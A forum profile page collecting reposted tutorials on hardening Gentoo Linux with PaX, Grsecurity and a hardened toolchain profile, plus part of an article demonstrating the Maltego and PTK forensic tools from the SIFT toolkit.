Jump to content

Aerosol

Active Members
  • Posts

    3453
  • Joined

  • Last visited

  • Days Won

    22

Everything posted by Aerosol

  1. Configuring PaX with Grsecurity We’ve already briefly discussed PaX, but now it’s time to describe it in detail. PaX provides the following security enhancements: Non-executable memory: Sections that do not contain actual program code are marked as non-executable to prevent jumping to arbitrary location in memory and executing the code from there. Therefore, PaX ensures that program data is kept in a non-executable memory region from which we cannot execute code. ASLR: PaX provides support for randomizing the address space of the program to prevent sections from being loaded to the same base address upon program/system restart. Miscellaneous memory protection: PaX also provides other protections that are described in [5]. We’ve also mentioned that we need to use PaX-enabled kernel such as hardened-sources in order to use PaX. The hardened-sources kernel also supports Grsecurity, which is why we’ll be using it here. First we need to install it onto the current system. # emerge sys-kernel/hardened-sources This will download and extract the kernel into /usr/src/ directory; the kernel will have the word “hardened” contained in the name, which is how we can differentiate between different kernels. To configure a hardened kernel, we should enter the kernel directory /usr/src/linux-3.10.1-hardened-r1/ and issue the “make menuconfig” command. Then we should go under Security Options – Grsecurity, where the following will be available. Note that some options are only available in amd64 architecture, while others are available on x86; we’ll be looking only at the amd64 configuration options, but they should be pretty much the same on both architectures. We must choose “Customize Configuration,” which will present PaX-related settings to us, as shown below. The PaX menu has the following options available (note that the description provided with each of the options presented below is taken from kernel’s Help menu, which you can also see on the picture above). Enable various PaX features PaX control Support soft mode: Allows running PaX in soft mode, which doesn’t enforce PaX features by default; PaX is enabled only on explicitly marked executables. Use ELF program header marking: Enables adding PaX-specific header to ELF executable, which enables us to enable/disable PaX features on executable basis by using paxctl. Use filesystem extended attributes marking: Similar option to the “Use ELF program header marking” except that per executable PaX features are controlled with setfattr, where the control flags are read from the user.pax.flags extended file attribute. Note that the filesystem used must support these extended attributes, so we should only use this option with supported filesystems. MAC system integration [none, direct, hook]: Option for controlling per executable PaX features through mandatory access control (MAC) system. Non-executable page Enforce non-executable pages: Memory pages are marked as non-executable, which prevents an attacker from loading a shellcode into memory and executing it; typical memory sections that need to be marked as non-executable are stack and heap, which need to be marked as non-executable if we want to prevent various kinds of attacks like stack or heap buffer overflows. If this option is disabled, then the memory block returned by malloc function will be readable as well as executable, which shouldn’t be the case; the memory region returned by malloc should not be executable. There are some programs that rely on memory returned by malloc to be executable, like WINE, but we should learn to live without those programs (at least on hardened machine). Paging based non-executable pages: Paging feature of the CPU that uses hardware non-executable bit support. Emulate trampolines: Some programs use trampolines to execute instructions from non-executable memory pages. If we enable the non-executable pages, programs won’t be able to use the trampolines anymore. Therefore, to still allow specific programs to use trampolines, we should enable this feature to emulate the trampolines but still have the protection provided by non-executable pages. Restrict mprotect(): this option prevents programs from changing the non-executable memory pages into executable, changing read-only memory pages into writable, creating executable pages from anonymous memory, and making relro data pages writable again. We can also use chpax or paxctl to control this feature on a per executable basis. Use legacy/compat protection demoting: When an application tries to allocate RWX memory, the kernel denies access by returning the proper error code to the application. Allow ELF text relocations: The libraries that use position-independent code do not need to relocate their code, which the attacker can use to attack the system; this is why we shouldn’t enable this option. Enforce non-executable kernel pages: when we use this option, injecting code into kernel memory is harder, because the kernel enforces non-executable bit on kernel pages; this is a kernel-mode equivalent of PAGEEXEC and MPROTECT. Return Address Instrumentation Method [bts, or]: Specify the method used to dereference pointers. The “bts” option is compatible with binary-only modules, but has a higher runtime overhead, while the “or” is incompatible with binary-only modules, but has lower runtime overhead. Address Space Layout Randomization Address Space Layout Randomization: By enabling this option, we can randomize the following memory areas when the program is loaded: task’s kernel and user stack, base address of executable and base address for mmap() function calls that creates a new mapping in the process’s virtual address space. Randomize kernel stack base: Randomizes the kernel stack of every task running in the kernel. Randomize user stack base: Randomizes the user stack of every task running in the user-space. Randomize mmap() base: Randomizes the base address for the mmap() function calls, which causes all dynamically loaded libraries to be loaded at random addresses, making it harder to guess the right address. Miscellaneous Hardening Features Sanitize kernel stack: When enabled, this option deletes the kernel stack before returning from a system call, which reduces the information a kernel stack leak can reveal. If you decide to enable this option, keep in mind that the slowdown of the system will be about 1%. Forcibly initialize local variables copied to userland: When enabled, this option zero-initializes some local variables that are copied to user space to prevent information leakage from the kernel. This option is similar to the previous option, but doesn’t slow down the system as much. Prevent invalid userland pointer dereference: When enabled, this option prevents dereferencing userland pointers where kernel pointers are expected, which can be useful in preventing exploitation due to the kernel bugs. Whenever a program calls into the kernel to do some action, the kernel needs to take the userland pointer and read data from it. Malicious software can exploit that to perform some actions in the kernel that should not be allowed; when this option is enabled, the kernel doesn’t directly use the userland pointer. Prevent various kernel object reference counter overflows: When enabled, this option prevents overflowing various kinds of object reference counters due to their abuse. Reference counters are used for counting objects, but an attacker can misuse them by incrementing them so much that they will reach the maximum number and wrap around, which might set the counter to zero or to a negative number. This can result in unexpected actions such as freeing the memory that’s still being used. Automatically constify eligible structures: When enabled, this option will automatically mark a class that contains only function pointers as being constant, which prevents overwriting this piece of memory (because it’s marked as const). This prevents the attacks that try to overwrite function pointers to point to shellcode, which is executed when that function gets called. Harden heap object copies between kernel and userland: When enabled, the kernel will enforce the size of heap objects when they are copied between user and kernel land. Prevent various integer overflows in function size parameters: When enabled, the kernel will recompute expressions passed as function arguments with double precision and, if an overflow occurs, the event is logged and the process killed. Generate some entropy during boot: when enabled, the kernel will extract some entropy from program state, which causes a minor slowdown of the system boot process. Memory protections Deny reading/writing to /dev/kmem, /dev/mem, and /dev/port: When enabled, we won’t be able to use the /dev/kmem, /dev/mem, /dev/port, and /dev/cpu/*/msr, which means that an attacker won’t be able to insert malicious code into the running kernel; the attacker won’t even be able to open those devices if this option is enabled. But, he might still be able to modify the running kernel by using privileged I/O through ioperm/iopl. Disable privileged I/O: When enabled, the ioperm/iopl calls will be disabled and will return an error, which will prevent an attacker from changing the running kernel by using those operations. If you use X server with your hardened kernel, this option should be disabled, otherwise the X server will fail to start with “xf86EnableIOPorts: failed to set IOPL for I/O (Operation not permitted)” failure message. Disable unprivileged PERF_EVENTS usage by default: When enabled, the /proc/sys/kernel/perf_event_paranoid can be set to 3 through sysctl, which will prevent unprivileged use of PERF_EVENTS syscalls. Insert random gaps between thread stacks: When enabled, a random gap will be put between thread stacks, which reduces the reliability of overwriting another thread’s stack. Harden ASLR against information leaks and entropy reduction: When enabled, the /proc/<pid>/maps and /proc/<pid>/stat will contain no information about the memory addresses used by the process <pid>. Additionally, the suid/sgid binary programs will have the argv/env strings limited to 512KB and stack limited to 8MB to prevent abuse. We need to enable this to harden the ASLR security a little bit more, so it can’t be easily bypassed. Deter exploit bruteforcing: Often programs start a new thread or fork a new child in order to accept a new connection. This allows an attacker to bruteforce the unknown part of the shellcode in order to gain code execution; this is possible because the target process is not killed, only the thread/child is killed. This option slows down bruteforcing attempts by delaying the parent process by 30 seconds on every fork when a child is killed by PaX or crashed due to an illegal instruction. When that happens, the administrator will have to manually restart the daemon to make it behave normally again. Harden module auto-loading: When enabled, the module auto-loading will be limited to privileged users. This prevents loading vulnerable modules into the kernel by unprivileged users. We can also disable the auto-loading of modules altogether but, depending on the use, we might not want to do that; therefore this option is perfect for limiting access to auto-loading features. Hide kernel symbols: When enabled, the information on loaded modules and displaying kernel symbols will be restricted to privileged users. This prevents unprivileged users from getting their hands on kernel information, such as variables, functions, and symbols. Active kernel exploit response: When enabled, if a PaX alert is triggered because of suspicious activity in the kernel, the kernel will actively respond to the thread not only by terminating the process that caused the alert, but also by blocking the user that started the process to prevent further exploitation. If the user is root, then the kernel will panic the system; if it’s a normal user, the alert will be logged, all user processes will be terminated and new processes (by the same user) will be permitted to start only after system restart. Role-Based Access Control Options Disable RBAC system: When enabled, the /dev/grsec device is removed from the kernel, which disables the RBAC system. If you want to use the RBAC system, you should leave this option disabled. Hide kernel processes: When enabled, all kernel threads are hidden to all processes. We should enable this feature if we will use RBAC. Maximum tries before password lockout: Specifies the maximum number of times a user can re-enter the password before being blocked for a certain period of time. This effectively prevents bruteforcing the password. Time to wait after max password tries, in seconds: Specifies the time the user must wait after entering the password incorrectly a predefined number of times. Filesystem Protections Proc restrictions: When enabled, the security of the /proc filesystem will be hardened. Restrict /proc to user only: When enabled, the non-root users will only be able to see their own processes. Allow special group: When enabled, a chosen group will be able to see all processes and network information, while the kernel and symbol information may still remain invisible (depends on other options). Additional restrictions: When enabled, the /proc filesystem will be further protected by restricting normal users from seeing device and slabinfo information. Linking restrictions: When enabled, the users will only be able to follow symlinks owned by themselves, but not other users in world-writable +t directories, such as /tmp. A sysctl option linking_restrictions is created. Kernel-enforced SymlinksIfOwnerMatch: When enabled, a secure replacement for Apache’s SymlinksIfOwnerMatch option will be used for the specified group. A sysctl option enforce_symlinksifowner is created. FIFO restrictions: When enabled, each user will only be able to write to a FIFO he owns (in a world-writable +t directories such as /tmp). A sysctl option fifo_restrictions is created. Sysfs/debugfs restriction: When enabled, the sysfs as well as debugfs will only be accessible by root. This lowers the possibility of an attacker exploiting those filesystems, whose purpose is to provide br access to hardware and debug information. This option doesn’t go well with desktop system, because it leaks certain things. For example, if we want to start a wicd-client program, we’ll get this error message “OSError: [Errno 13] Permission denied: ‘/sys/class/net/’” and the wicd-client won’t be able to start under normal user; we can nevertheless run it as root. This option also breaks pulseaudio and battery widgets, which won’t be able to get access to the /sys filesystem, which is why the pulseaudio on a hardened system might not work. Don’t enable this option if you’re on a desktop system. Runtime read-only mount protection: When enabled, the filesystem will be protected so that no writable mounts are allowed, read-only mounts cannot be remounted as read-write, and write operations are disabled for block devices. This option is mainly useful for embedded devices. A sysctl option romount_protect is created. Eliminate stat/notify-based device sidechannels: When enabled, the timing analysis on devices by using stat or inotify/dnotify/fanotify will be disabled for unprivileged users. Chroot jail restrictions: When enabled, we can make breaking out of chrooted jail much more difficult. Various options can be enabled that will make processes inside jail more restrictive. Deny mounts: Processes inside jail won’t be able to mount filesystems. Deny double-chroots: Processes inside jail won’t be able to chroot again outside the chroot, which is one of the methods used for breaking out of chroot jail. A sysctl option chroot_deny_chroot is created. Deny pivot_root in chroot: Processes inside jail won’t be able to use the pivot_root() function, which can be used to break out of chroot by changing root filesystem. A sysctl option chroot_deny_pivot is created. Enforce chdir(“/”) on all chroots: When enabled, the current working directory will be changed to the root directory of the chroot when chrooted applications are used. A sysctl option chroot_enforce_chdir is created. Deny (f)chmod +s: Processes inside jail won’t be able to chmod/fcmod files to change suid/sgid bits, which is just another method of breaking out of chroot. A sysctl option chroot_deny_chmod is created. Deny fchdir out of chroot: When enabled, another attack method of breaking out of chroot environment will be prevented: the fchdiring to a file descriptor of the chrooting process that points to a directory outside the filesystem. A sysctl option chroot_deny_fchdir is created. Deny mknod: Processes inside jail won’t be allowed to use mknod, which an attacker can use to create the same device that already exists and steal or delete data from hard drive. A sysctl option chroot_deny_mknod is created. Deny shmat() out of chroot: Processes inside jail won’t be able to attach to shared memory segments that were created outside chroot. A sysctl option chroot_deny_shmat is created. Deny access to abstract AF_UNIX sockets out of chroot: Processes inside jail won’t be able to connect to sockets that were bound outside of chroot. A sysctl option chroot_deny_unix is created. Protect outside processes: Processes inside jail won’t be able to kill and view and processes outside chroot or send signals with fcntl, ptrace, capget, getpgid, setpgid, getsid. A sysctl option chroot_findtask is created. Restrict priority changes: Processes inside jail won’t be able to raise the priority of the processes in chroot. A sysctl option chroot_restrict_nice is created. Deny sysctl writes: When enabled, a user in chroot won’t be able to write to sysctl entries by sysctl or /proc. A sysctl option chroot_deny_sysctl is created. Capability restrictions: When enabled, certain capabilities of the processes in chroot will be disabled. A sysctl option chroot_caps is created. Exempt initrd tasks from restrictions: When enabled, tasks created prior to init will be excluded from chroot restrictions, which disables privileged operations of Plymouth’s in chroot. Kernel Auditing Single group for auditing: This option can be used when we want to log only certain users on the system and not the whole system; we can specify only the group we want to monitor. A sysctl option audit_group is created. Exec logging: When enabled, all execve and thus exec calls will be logged. This option is useful when the system is used as a server and we would like to keep track of users. A sysctl option exec_logging is created. Note that this option will produce a lot of logs on an active system. Resource logging: When enabled, all requests for resources that try to allocate more than the maximum limit will be logged. A sysctl option resource_logging is created. Log execs within chroot: When enabled, all executions inside chroot jail will be logged to syslog. A sysctl option chroot_execlog is created. Ptrace logging: when enabled, all attempts to attack a process via ptrace will be logged. A sysctl option audit_ptrace is created. Chdir logging: When enabled, all chdir calls are logged. A sysctl option audit_chdir is created. (Un)Mount logging: When enabled, all mounts/unmounts will be logged. A sysctl option audit_mount is created. Signal logging: When enabled, various signals will be logged, which might be triggered because of a possible exploit attempt. A syslog option signal_logging is created. Fork failure logging: When enabled, all failed fork attempts will be logged, which can detect a fork bomb. A sysctl option forkfail_logging is created. Time change logging: When enabled, any changes to the system time are logged. A sysctl option timechange_logging is created. /proc/<pid>/ipaddr support: When enabled, a new entry /proc/<pid>/ipaddr will be created, containing the address of the person using the task. Denied RWX mmap/mprotect logging: When enabled, the mmap and mprotect calls will be logged when being blocked by PaX. A syslog option rwxmap_logging is created. ELF text relocations logging: When enabled, the text relocations in certain binary/library will be logged. We can use this to detect the programs or libraries that need text relocations in order to get rid of them. A sysctl option audit_textrel is created. Executable Protections Dmesg(8) restriction: When enabled, the non-root users won’t be able to use the dmesg command to view the kernel logs, which might contain kernel addresses that the attacker could use for exploitation. A sysctl option dmesg is created. Deter ptrace-based process snooping: when enabled, a non-root user won’t be able to attach to an arbitrary process and monitor it by using ptrace. A sysctl option harden_ptrace is created. Require read access to ptrace sensitive binaries: When enabled, a non-root users won’t be able to monitor unreadable binaries by using ptrace. A syslog option ptrace_readexec is created. Enforce consistent multithreaded privileges: When using multi-threaded application, a change from root uid to non-root uid will be propagated through all the threads, not just the current one. A sysctl option consistent_setxid is created. Trusted path execution (TPE): This option restricts the execution of files based on their path, which makes privilege escalation exploiting harder; if an attacker can upload a binary into an untrusted path on the server, he won’t be able to execute it. When using this option on a desktop system, it’s best to set the “Invert GID option.” By using TPE, file execution is more restricted, which might also break emerge from install certain packages sometimes, but it’s nevertheless a useful security option. If we merely enabled the TPE without enabling the options below, only a selected group will be able to execute files in root-owned directories writable only by root. A sysctl option tpe is created. Partially restrict all non-root users: If enabled, all non-root users will be able to execute files in root-owned directories writable by root and directories owned by the user, which are not group- or world-writable. A sysctl option tpe_restrict_all is created. Invert GID option: This option specifies that users in not in the chosen group will only be able to execute files in-root owned directories writable only by root (this option restricts users from executing files in user-owned directories that are not group- or world-writable). Additionally, the selected group will not have this option enabled, which is useful if we want to apply TPE to most users on the system except the ones specified on chosen group. A sysctl option tpe_incert is created. GID for TPE-untrusted users/GID for TPE-trusted users: Note that this option makes changes based on previously selected options. Whenever this option specifies “GID for TPE-untrusted users,” it actually specifies the group that will have TPE enabled; the group will be marked as untrusted and the execution permissions of users belonging to that group will be limited. When the option is “GID for TPE-trusted users,” it specifies a group whose users will be able to execute files in a user-owned directory which is not group- or world-writable. A sysctl option tpe_gid is created. Network Protections Larger entropy pools: When enabled, the entropy used by Linux will double. TCP/UDP blackhole and LAST_ACK DoS prevention: When enabled, neither TCP RST nor ICMP destination-unreachable packets will be sent as a response for packets received with no listening process. This feature can be very useful if we want to reduce the visibility against scanners such as nmap. Two sysctl options ip_blackhole and lastack_retries will be created. Disable TCP simultaneous connect Socket restrictions Deny any sockets to group: Specifies a group that won’t be able to connect to other hosts or run server applications. A sysctl option socket_all is created. Deny client sockets to group: Specifies a group that won’t be able to connect to other hosts, but will be able to run server applications. A sysctl option socket_client is created. Deny server sockets to group: Specifies a group that won’t be able to run server applications. A sysctl option socket_server is created. Sysctl Support Sysctl support: When enabled, we will be able to change the grsecurity options without recompiling the kernel. We can change values by changing the values in /proc/sys/kernel/grsecurity. Extra sysctl support for distro makers: When enabled, additional sysctl options are created that can be used to manipulate processes running as root. In order to use this option, grsec_lock needs to be enabled after boot. Turn on features by default: If enabled, all sysctl features are enabled by default. Logging Options Add source IP address to SELinux AVC log messages: When enabled, the source IP address of the remote machine will be added to log messages. Seconds in between log messages: Specifies the number of seconds between grsecurity log messages. Number of messages in a burst: Specifies the maximum number of messages allowed within the flood time interval. After we’ve enabled all the options that we want to use, we must save the kernel configuration and build the kernel by executing the command below: # make && make modules && make modules_install After that, we should copy our newly built kernel to /boot directory and change the grub.conf to boot from newly built kernel. We can copy the kernel to /boot partition with the command below: # cp arch/x86_64/boot/bzImage /boot/kernel-hardened The grub.conf should then look like this: title=Gentoo root (hd0,0) kernel /boot/kernel-hardened root=/dev/sda3 If something goes wrong or doesn’t work after the reboot, we should start the rsyslog daemon and look into the /var/log/syslog file for grsec entries, which should clearly state the reason for problems. We should start with the kernel that gives us the least privilege and then slowly add permissions as needed. # /etc/init.d/rsyslog start # tail -f /var/log/syslog References: [1] Hardened Gentoo Project:Hardened - Gentoo Wiki. [2] Security-Enhanced Linux Security-Enhanced Linux - Wikipedia, the free encyclopedia. [3] RSBAC RSBAC - Wikipedia, the free encyclopedia. [4] Hardened/Toolchain https://wiki.gentoo.org/wiki/Hardened/Toolchain#RELRO. [5] Hardened/PaX Quickstart https://wiki.gentoo.org/wiki/Project:Hardened/PaX_Quickstart. [6] checksec.sh trapkit.de - checksec.sh. [7] KERNHEAP http://subreption.com/products/kernheap/. [8] Advanced Portage Features Gentoo Linux Documentation -- Advanced Portage Features. [9] Elfix Homepage elfix. [10] Avfs: An On-Access Anti-Virus File System Avfs: An On-Access Anti-Virus File System. [11] Eicar Download, Download ° EICAR - European Expert Group for IT-Security. [12] Gentoo Security Handbook, Gentoo Linux Documentation -- Gentoo Security Handbook. Source
  2. Introduction In this tutorial, we’ll talk about how to harden a Linux system to make it more secure. We’ll specifically use Gentoo Linux, but the concepts should be fairly similar in other distributions as well. Since the Gentoo Linux is a source distribution (not binary, as most other Linux distributions are), there will be enough details provided to do this in your own Linux distribution, although some steps will not be the same. If we look at the hardened Gentoo project web page located at [1], we can see a couple of projects that can be used to enhance the security of the Linux operation system; they are listed below. PaX is a kernel patch that protects us from stack and heap overflows. PaX does this by using ASLR (address space layout randomization), which uses random memory locations in memory. Each shellcode must use an address to jump to embedded in it in order to gain code execution and, because the address of the buffer in memory is randomized, this is much harder to achieve. PaX adds an additional layer of protection by keeping the data used by the program in a non-executable memory region, which means an attacker won’t be able to execute the code it managed to write into memory. In order to use PaX, we have to use a PaX-enabled kernel, such as hardened-sources. PIE/PIC (position-independent code): Normally, an executable has a fixed base address where they are loaded. This is also the address that is added to the RVAs in order to calculate the address of the functions inside the executable. If the executable is compiled with PIE support, it can be loaded anywhere in memory, while it must be loaded at a fixed address if compiled with no PIE support. The PIE needs to be enabled if we want to use PaX to take advantage of ASLR. RELRO (relocation read-only): When we run the executable, the loaded program needs to write into some sections that don’t need to be marked as writable after the application was started. Such sections are .ctors, .dtors, .jcr, .dynamic, and .got [4]. If we mark those sections as read-only, an attacker won’t be able to use certain attacks that might be used when trying to gain code execution, such as overwriting entries in a GOT table. SSP (stack-smashing protector) is used in user-mode; it protects against stack overflows by placing a canary on the stack. When an attacker wants to overflow the return EIP address on the stack, he must also overflow the randomly chosen canary. When that happens, the system can detect that the canary has been overwritten, in which case the application is terminated, thus not allowing an attacker to jump to an arbitrary location in memory and execute code from there. RBAC (role-based access control): Note that RBAC is not the same as RSBAC, which we’ll present later on. The RBAC is an access control that can be used by SELinux, Grsecurity, etc. By default, the creator of a file has total control over the file, while the RBAC forces the root user to have control of the file, regardless of who created it. Therefore all users on the system must follow the RBAC rules set by administrator of the system. Additionally, we can also use the following access control systems, which are used to control access between processes and objects. Normally, we have to choose one of the systems outlined below, because only one of the access control systems can be used at a time. Access control systems include the following: SELinux (security-enhanced Linux) AppArmor (application armor) Grsecurity, which contains various patches that can be applied to the kernel to increase the security of a whole system. If we would like to enable Grsecurity in the kernel, we must use a Grsecurity-enabled kernel, which is hardened-sources. RSBAC (rule set-based access control): We must use rsbac-sources kernel to build a kernel with rsbac support. SMACK Each of the systems mentioned above can be used to make the exploitation of your system harder for an attacker. Let’s say you’re running a vulnerable application that’s listening on some predefined port that an attacker can connect to from anywhere; we can imagine a FTP server. The installed version of the FTP server contains a vulnerability that can be triggered and exploited by using an overly long APPE FTP command. If the FTP server is not updated, an attacker can exploit the vulnerability to gain total control of the Linux system, but if we harden the system, we might prevent the attacker from doing so. In that case, the vulnerability is still presented in the vulnerable FTP server, but the attacker won’t be able to exploit it due to the security enhancements in place. The Portage Profile Every Gentoo installation has a Portage profile, which specifies the default USE flags for the whole system. Portage is Gentoo’s package management system, which uses many of the system files when installing a system and specific programs. All files that affect the installation of specific package are listed in the portage man page, which can be invoked by executing “man portage.” The USE flags are used to specify which functionality within each package we want to compile the package with. We can list the USE flags with “equery uses ” command, as shown below: # equery uses xterm [ Legend : U - final flag setting for installation] [ : I - package is installed with flag ] [ Colors : set, unset ] * Found these USE flags for x11-terms/xterm-285: U I - - Xaw3d : Add support for the 3d athena widget set - - toolbar : Enable the xterm toolbar to be built + + truetype : Add support for FreeType and/or FreeType2 fonts + + unicode : Add support for Unicode Notice that package xterm has unicode and truetype enabled, but Xaw3d and toolbar disabled; those are the features that we can freely disable/enable, after which we need to recompile the package. By doing that, the package will be able to use Unicode characters, but if we disable the unicode USE flags, the Unicode characters won’t be supported anymore. So, when we select a system profile, we’re actually selecting the default USE flags that will be used to build the system with. All the available profiles can be listed by issuing the “eselect profile list” command, as seen below. Notice that the default profile is the one marked with the character ‘*’? # eselect profile list Available profile symlink targets: [1] default/linux/amd64/13.0 [2] default/linux/amd64/13.0/selinux [3] default/linux/amd64/13.0/desktop * [4] default/linux/amd64/13.0/desktop/gnome [5] default/linux/amd64/13.0/desktop/kde [6] default/linux/amd64/13.0/developer [7] default/linux/amd64/13.0/no-multilib [8] default/linux/amd64/13.0/x32 [9] hardened/linux/amd64 [10] hardened/linux/amd64/selinux [11] hardened/linux/amd64/no-multilib [12] hardened/linux/amd64/no-multilib/selinux [13] hardened/linux/amd64/x32 [14] hardened/linux/uclibc/amd64 The profiles listed above have the syntaxes shown in the list below. Profile number: the number of each profile embedded in the brackets [ and ]. Profile type: the type of profile, where the normal profiles are specified with the default keyword, while the hardened profiles are listed with hardened keyword. Profile subtype: the profile subtype used for the kernel, which can be either linux or bsd. Architecture: the architecture of the profile, which can be one of the listed values: x86, amd64, etc. Release number: release number of the profile. Target: target of the profile, which can be one of the values, selinux, desktop, developer, etc. The desktop target also has two subtargets kde and gnome. All the files for profiles are available under /usr/portage/profiles/ directory. The current profile “default/linux/amd64/13.0/desktop” is located in the /usr/portage/profiles/default/linux/amd64/13.0/desktop/ directory and contains the following files. # ls /usr/portage/profiles/default/linux/amd64/13.0/desktop/ -l total 8 -rw-r--r-- 1 portage portage 2 Jan 16 2013 eapi drwxr-xr-x 2 portage portage 30 Jan 16 2013 gnome drwxr-xr-x 2 portage portage 30 Jan 16 2013 kde -rw-r--r-- 1 portage portage 34 Jan 16 2013 parent The gnome and kde represent the subprofiles, while the parent file is used to pull in additional profiles that constitutes the current profile. The parent file contains the following: # cat /usr/portage/profiles/default/linux/amd64/13.0/desktop/parent .. ../../../../../targets/desktop In order to fully understand the profile we must pull in the parent directory as well as the “../../../../../targets/desktop” directory, which contains the following files: # ls /usr/portage/profiles/default/linux/amd64/13.0/ desktop developer eapi no-multilib package.use.stable.mask parent selinux use.mask use.stable.mask x32 # ls /usr/portage/profiles/targets/desktop/ gnome kde make.defaults package.use There are multiple files that can be used with each profile, but in our case the following files are used: make.defaults: package.use package.use.stable.mask use.mask use.stable.mask eapi package.use … In addition, the referenced profiles can themselves reference other profiles, which are also pulled in. The most interesting files are make.defaults and package.use. The make.defaults contains all the default USE flags that will be used when building the system. The USE flags can be seen below. # cat /usr/portage/profiles/targets/desktop/make.defaults USE="a52 aac acpi alsa bluetooth branding cairo cdda cdr consolekit cups dbus dri dts dvd dvdr emboss encode exif fam firefox flac gif gpm gtk jpeg lcms ldap libnotify mad mng mp3 mp4 mpeg ogg opengl pango pdf png policykit ppds qt3support qt4 sdl spell startup-notification svg tiff truetype vorbis udev udisks unicode upower usb wxwidgets X xcb x264 xml xv xvid" The package.use file is used to apply certain USE flags to specific packages, which can be seen below. The net-nds/openldap will be compiled with the minimal USE flags. # cat /usr/portage/profiles/targets/desktop/package.use | grep -v ^# | grep -v ^$ <gnome-base/gvfs-1.14 gdu -udisks dev-libs/libxml2 python media-libs/libpng apng sys-apps/systemd gudev introspection keymap sys-fs/eudev gudev hwdb introspection keymap >=sys-fs/udev-171 gudev hwdb introspection keymap >=virtual/udev-171 gudev hwdb introspection keymap xfce-base/xfdesktop thunar net-nds/openldap minimal If we run the “equery uses openldap” command, we’ll see that the minimal USE flag is enabled. The USE flags that will be used are presented in the picture below, where the red USE flags are enabled and blue USE flags are disabled. Notice that the minimal USE flag is red and therefore enabled. /usr/portage/profiles/targets/desktop/package.use and comment out the “net-nds/openldap minimal” line and then rerun the “equery uses openldap” command, the minimal USE flag will be disabled, as can be seen below. Therefore we can see how the USE flags affect the system we’re using. In order to select a hardened profile, we must run the command below to set the “hardened/linux/amd64? profile. # eselect profile set 9 After setting the profile that we want, we can check whether the change was successful (notice that the ‘*’ character does not specify the “hardened/linux/amd64? profile. # eselect profile list Available profile symlink targets: [1] default/linux/amd64/13.0 [2] default/linux/amd64/13.0/selinux [3] default/linux/amd64/13.0/desktop [4] default/linux/amd64/13.0/desktop/gnome [5] default/linux/amd64/13.0/desktop/kde [6] default/linux/amd64/13.0/developer [7] default/linux/amd64/13.0/no-multilib [8] default/linux/amd64/13.0/x32 [9] hardened/linux/amd64 * [10] hardened/linux/amd64/selinux [11] hardened/linux/amd64/no-multilib [12] hardened/linux/amd64/no-multilib/selinux [13] hardened/linux/amd64/x32 [14] hardened/linux/uclibc/amd64 Note that by running the “eselect profile set 9” command we didn’t actually change anything in the system. We merely changed the profile that will be used when building and installing packages, which means the new USE flags will be used when packages are being installed. Therefore we must rebuild the system in order for the changes to take effect. One of the important packages in the system are the ones that are actually used in building process, such as gcc, binutils, and glibc. Those packages are the heart of the Gentoo Linux system, since they are used to compile and link the packages. If we want to apply the hardened profile to those packages, we must rebuild them by issuing the emerge command. # emerge virtual/libc sys-devel/gcc sys-devel/binutils Once the rebuilding is done, we’ll have a hardened toolchain ready to start building other packages by using the hardened profile. We also need to set the hardened gcc compiler as default. Note that we can choose gcc with both SSP and PIE enabled or disabled. We can display all available gcc versions with the “gcc-config -l” command, as seen below. The first option, which supports SSP as well as PIE, is already selected, so we don’t have to do anything. # gcc-config -l [1] x86_64-pc-linux-gnu-4.5.4 * [2] x86_64-pc-linux-gnu-4.5.4-hardenednopie [3] x86_64-pc-linux-gnu-4.5.4-hardenednopiessp [4] x86_64-pc-linux-gnu-4.5.4-hardenednossp [5] x86_64-pc-linux-gnu-4.5.4-vanilla References: [1] Hardened Gentoo http://www.gentoo.org/proj/en/hardened/. [2] Security-Enhanced Linux Security-Enhanced Linux - Wikipedia, the free encyclopedia. [3] RSBAC RSBAC - Wikipedia, the free encyclopedia. [4] Hardened/Toolchain https://wiki.gentoo.org/wiki/Hardened/Toolchain#RELRO. [5] Hardened/PaX Quickstart https://wiki.gentoo.org/wiki/Project:Hardened/PaX_Quickstart. [6] checksec.sh trapkit.de - checksec.sh. [7] KERNHEAP http://subreption.com/products/kernheap/. [8] Advanced Portage Features http://www.gentoo.org/doc/en/handbook/handbook-amd64.xml?part=3&chap=6. [9] Elfix Homepage elfix. [10] Avfs: An On-Access Anti-Virus File System Avfs: An On-Access Anti-Virus File System. [11] Eicar Download, Download ° EICAR - European Expert Group for IT-Security. [12] Gentoo Security Handbook, http://www.gentoo.org/doc/en/security/security-handbook.xml. Source
  3. This is a continuation of the first article on SANS Investigate Forensics Toolkit. In this article we will be covering the rest of the tools discussed earlier in the start of the article. Maltego Maltego is an open source intelligence gathering and forensics tool. It provides a library of transforms for the discovery of data from open sources and visualizing that information in a graph format. It provides a link between people, websites, groups and all other Internet infrastructure which might be connected to some entity. For using this we need to create an account and then log in using that credentials. Once we have logged in, we will have a long list of infrastructure which we may use for information gathering. This is a very powerful tool because of the link that it creates. Now let us start some investigation/ intelligence gathering about example.com. This has been done purely for demonstration purpose. Now let us run all transforms by right clicking the domain entity. We can see a large amount of information being shown to us. We can also run specific transforms to gather more information on particular entities. Hence you can see that we were able to gather a lot of information. Similarly, doing multiple transforms can keep digging out more information. Go ahead and try this on any entity you may wish to. PTK The PTK tool is digital forensic tool and is a GUI for SleuthKit. This uses a centralized database for case management and has the ability to allow multiple investigators to work on the same case. It has an interesting feature of timeline analysis and file timestamps that clearly lists the timeline of all the activities. My personal opinion is that this is one of the best tools to do for digital forensic investigation. Let us have some hands on now with it. This is how the interface looks: Let us create a new case to do the forensic investigation. We have our first case created here: Now let us add some raw image to perform our investigation. We have the option to calculate MD5 and SHA1 hashes as well. After filling in the details, finally we have the image added in our case: We now move on to some indexing operations for the image to keep a track of our investigation. Now let us move to some analysis, where we will analyze the image for forensic evidence. So we have it here, a detailed view of all the files on the image with time stamping, modification timings, and md5 hashes as well. This is just fabulous! We can export these images for further investigation as well as have all the details about a specific file. The timeline feature which I talked about previously in the article above is just awesome. I can have a view of all the files and activity which was done on a particular timeline which helps a lot in the investigation. So here is how we do it. Suppose I want to find out what files were accessed during which a particular incident happened. I simply put in the date which I suspect and get the results. We also have the feature to view the file details or the particular file in the timeline: PTK has a keyword search that helps to do searches for important keywords during a forensic investigation. We here search for the keyword “password,” let us see if it fetches some good results for our investigation. On searching for this keyword, we find a file named secret.txt which contains the keyword. This keyword searching may give a lot of important information during an investigation and is hence very important. Let us view this file to find out contents that might be interesting. Looks as if we have some of the user’s passwords. We also have a Gallery section that segregates out all the images to make our investigation simpler. Here is how it looks: PTK also gives us the option to view complete details of the image being forensically investigated. Here is how we do it: We also have options for bookmarking certain items that might be important and a neat report generator as well. PTK makes forensics extremely easy and a piece of cake! Volatility Volatility is one of the best tools for live memory forensics. It comes bundled with SIFT for doing memory 